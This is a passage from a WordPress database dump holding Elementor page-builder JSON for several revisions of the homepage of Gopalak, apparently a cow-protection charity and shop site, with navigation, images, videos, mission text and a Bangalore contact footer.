here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9982,1672,'_elementor_page_assets','a:0:{}'),(9984,1673,'_elementor_edit_mode','builder'),(9985,1673,'_elementor_template_type','wp-page'),(9986,1673,'_elementor_version','3.7.8'),(9987,1673,'_wp_page_template','elementor_canvas'),(9988,1673,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0300\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9989,1673,'_elementor_page_assets','a:0:{}'),(9992,1674,'_elementor_edit_mode','builder'),(9993,1674,'_elementor_template_type','wp-page'),(9994,1674,'_elementor_version','3.7.8'),(9995,1674,'_wp_page_template','elementor_canvas'),(9996,1674,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0300\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elT